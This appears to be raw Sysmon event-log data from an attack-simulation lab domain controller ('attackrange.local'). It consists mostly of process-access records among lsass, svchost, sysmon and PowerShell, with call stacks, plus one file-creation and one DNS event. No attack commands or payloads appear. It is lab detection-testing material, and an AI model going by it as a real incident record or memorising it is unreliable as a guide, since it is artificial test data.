13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
22542200x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.966{59A5CD1D-8E15-6005-B802-00000000A201}4560c.f.f.c.4.5.d.0.2.5.d.0.d.6.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.263{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA6-6005-0B00-00000000A201}876C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.263{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA6-6005-0B00-00000000A201}876C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.263{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1600-00000000A201}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.091{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.091{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.044{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ky0to2pa.ryg.ps12021-01-18 13:33:21.044 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.044{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
